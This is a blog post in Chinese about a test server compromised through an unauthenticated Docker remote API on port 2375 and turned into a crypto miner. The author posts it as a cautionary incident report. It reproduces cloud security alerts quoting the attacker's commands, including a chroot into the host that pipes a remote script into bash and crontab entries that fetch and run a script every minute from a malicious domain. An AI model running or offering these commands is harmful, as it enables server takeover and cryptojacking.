优秀的编程知识分享平台

网站首页 > 技术文章 正文

因Docker设置不当服务器被黑沦为矿机

nanyue 2024-07-22 14:01:40 技术文章 8 ℃

2021年5月6日,测试docker remote api开发了服务器对外接口,且使用了默认的2375,没有使用鉴权,然后5月7日凌晨被恶意基本攻击,服务器沦为矿机。

侥幸心理,偷懒了为了方便测试一下没有考虑安全问题,引以为戒!

还好,服务器是空的,没什么东西,就是测试docker镜像的,镜像已经在镜像仓库所以重装系统就好没什么太大损失。

阿里云的告警很不错,各位小伙伴都支持阿里云吧!

恶意代码

恶意脚本-恶意脚本代码执行待处理
备注
该告警由如下引擎检测发现:
命令行: chroot /mnt/ /bin/sh -c curl -fsSL <http://oracle.zzhreceive.top/b2f628fff19fda999999999/dk.sh> | bash
进程PID: 42096
进程文件名: busybox
父进程ID: 42087
父进程: runc
父进程文件路径: /usr/bin/runc
进程链:
-[1075]  /usr/bin/containerd
    -[42068]  /usr/bin/containerd-shim-runc-v2 -namespace moby -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 01f5d381f4326d0c09c64930fd6fe5a3c3329b28baffe784d30c19c6e524b782 start
        -[42077]  /usr/bin/containerd-shim-runc-v2 -namespace moby -id 01f5d381f4326d0c09c64930fd6fe5a3c3329b28baffe784d30c19c6e524b782 -address /run/containerd/containerd.sock
            -[42087]  runc --root /var/run/docker/runtime-runc/moby --log /run/containerd/io.containerd.runtime.v2.task/moby/01f5d381f4326d0c09c64930fd6fe5a3c3329b28baffe784d30c19c6e524b782/log.json --log-format json create --bundle /run/containerd/io.containerd.runtime.v2.task/moby/01f5d381f4326d0c09c64930fd6fe5a3c3329b28baffe784d30c19c6e524b782 --pid-file /run/containerd/io.containerd.runtime.v2.task/moby/01f5d381f4326d0c09c64930fd6fe5a3c3329b28baffe784d30c19c6e524b782/init.pid 01f5d381f4326d0c09c64930fd6fe5a3c3329b28baffe784d30c19c6e524b782

事件说明: 云安全中心检测到您的主机正在执行恶意的脚本代码(包括但不限于bash、powershell、python),请立刻排查入侵来源。如果是您的运维行为,请选择忽略。

恶意脚本-恶意脚本代码执行待处理
备注
该告警由如下引擎检测发现:
命令行: /bin/sh -c if ! type curl >/dev/null;then apt-get install -y curl;apt-get install -y --reinstall curl;yum clean all;yum install -y curl;yum reinstall -y curl;fi;echo "* * * * * root curl <http://oracle.zzhreceive.top/b2f628/cronb.sh|bash>">/etc/crontab && echo "* * * * * root curl <http://oracle.zzhreceive.top/b2f628/cronb.sh|bash>">/etc/cron.d/zzh
进程PID: 42381
进程文件名: bash
父进程ID: 42371
父进程: runc
父进程文件路径: /usr/bin/runc
进程链:
-[1075]  /usr/bin/containerd
    -[42354]  /usr/bin/containerd-shim-runc-v2 -namespace moby -address /run/containerd/containerd.sock -publish-binary /usr/bin/containerd -id 2c83909da52cfb8621f2c2f7183175d1cacbd3644b7f7871032a00dd70c94436 start
        -[42361]  /usr/bin/containerd-shim-runc-v2 -namespace moby -id 2c83909da52cfb8621f2c2f7183175d1cacbd3644b7f7871032a00dd70c94436 -address /run/containerd/containerd.sock
            -[42371]  runc --root /var/run/docker/runtime-runc/moby --log /run/containerd/io.containerd.runtime.v2.task/moby/2c83909da52cfb8621f2c2f7183175d1cacbd3644b7f7871032a00dd70c94436/log.json --log-format json create --bundle /run/containerd/io.containerd.runtime.v2.task/moby/2c83909da52cfb8621f2c2f7183175d1cacbd3644b7f7871032a00dd70c94436 --pid-file /run/containerd/io.containerd.runtime.v2.task/moby/2c83909da52cfb8621f2c2f7183175d1cacbd3644b7f7871032a00dd70c94436/init.pid 2c83909da52cfb8621f2c2f7183175d1cacbd3644b7f7871032a00dd70c94436

事件说明: 云安全中心检测到您的主机正在执行恶意的脚本代码(包括但不限于bash、powershell、python),请立刻排查入侵来源。如果是您的运维行为,请选择忽略。

恶意脚本-恶意脚本代码执行待处理
备注
该告警由如下引擎检测发现:
命令行: curl <http://oracle.zzhreceive.top/b2f628/cronb.sh>
进程PID: 42437
进程文件名: curl
父进程ID: 42436
父进程: bash
父进程文件路径: /usr/bin/bash
进程链:
-[1031]  /usr/sbin/crond -n
    -[42433]  /usr/sbin/crond -n
        -[42436]  /bin/sh -c curl <http://oracle.zzhreceive.top/b2f628/cronb.sh|bash>

事件说明: 云安全中心检测到您的主机正在执行恶意的脚本代码(包括但不限于bash、powershell、python),请立刻排查入侵来源。如果是您的运维行为,请选择忽略。





Tags:

猜你喜欢

最近发表
标签列表